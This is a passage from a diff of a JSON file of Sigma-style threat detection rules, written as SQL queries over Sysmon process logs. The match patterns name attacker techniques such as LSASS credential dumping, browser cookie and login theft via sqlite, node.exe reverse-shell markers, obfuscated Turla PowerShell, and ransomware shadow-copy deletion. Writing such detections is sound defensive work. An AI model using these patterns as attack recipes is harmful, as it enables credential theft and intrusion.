"4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "New printer port install on host" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "title": "Execute Code with Pester.bat", + "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for 
testing)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_lolbin_pester_1.yml" }, { - "title": "Suspicious Msbuild Execution By Uncommon Parent Process", - "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", "status": "experimental", - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "author": "frack113", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT 
* FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentImage LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nuget.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msbuild_susp_parent_process.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - AnyDesk Execution", - "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "title": "Arbitrary Command Execution Using WSL", + "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Automation and orchestration scripts may use this method to execute scripts etc.", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\' OR CommandLine LIKE '%--debug-shell%' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk.yml" + "filename": "proc_creation_win_wsl_lolbin_execution.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", - "author": "Florian Roth 
(Nextron Systems)", + "title": "Suspicious Firewall Configuration Discovery Via Netsh.EXE", + "id": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%netsh %' ESCAPE '\\' AND CommandLine LIKE '%show %' ESCAPE '\\' AND CommandLine LIKE '%firewall %' ESCAPE '\\' AND (CommandLine LIKE '%config %' ESCAPE '\\' OR CommandLine LIKE '%state %' ESCAPE '\\' OR CommandLine LIKE '%rule %' ESCAPE '\\' OR CommandLine LIKE '%name=all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_netsh_fw_rules_discovery.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "status": "experimental", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim 
Shelton", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" - }, - { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects 
rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "Suspicious Execution of Systeminfo", + "id": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", + "status": "experimental", + "description": "Detects usage of the \"systeminfo\" command to retrieve information", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR OriginalFileName = 'sysinfo.exe'))" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_systeminfo_execution.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", 
+ "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Service StartupType Change Via PowerShell Set-Service", - "id": "62b20d44-1546-4e61-afce-8e175eb9473c", + "title": "PDQ Deploy Remote Adminstartion Tool Execution", + "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", "status": "experimental", - "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of PDQ Deploy remote admin tool", + "author": "frack113", "tags": [ "attack.execution", - "attack.defense_evasion", - 
"attack.t1562.001" + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" ], - "filename": "proc_creation_win_powershell_set_service_disabled.yml" + "filename": "proc_creation_win_pdqdeploy_execution.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine 
LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR 
CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "Suspicious Userinit Child Process", - "id": "b655a06a-31c0-477a-95c2-3726b83d649d", + "title": "Curl.EXE Execution With Custom UserAgent", + "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", "status": "test", - "description": "Detects a suspicious child process of userinit", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", + "description": "Detects execution of curl.exe with custom useragent options", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ - "Administrative scripts" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_userinit_child.yml" + "filename": "proc_creation_win_curl_useragent.yml" }, { - "title": "Suspicious Execution of Shutdown", - "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", "status": "test", - "description": "Use of the commandline to shutdown or reboot windows", - "author": "frack113", + "description": "Detects specific process characteristics of Maze ransomware word document 
droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1047", "attack.impact", - "attack.t1529" + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_execution.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Process Memory Dump Via Dotnet-Dump", + "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.010" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. 
The PID/Process Name of the process being dumped needs to be investigated" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_lolbin_dotnet_dump.yml" }, { - "title": "Psexec Execution", - "id": "730fc21b-eaff-474b-ad23-90fd265d4988", - "status": "test", - "description": "Detects user accept agreement execution in psexec commandline", - "author": "omkar72", + "title": "Use of Mftrace.exe", + "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "status": "experimental", + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "attack.t1021" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Administrative scripts." 
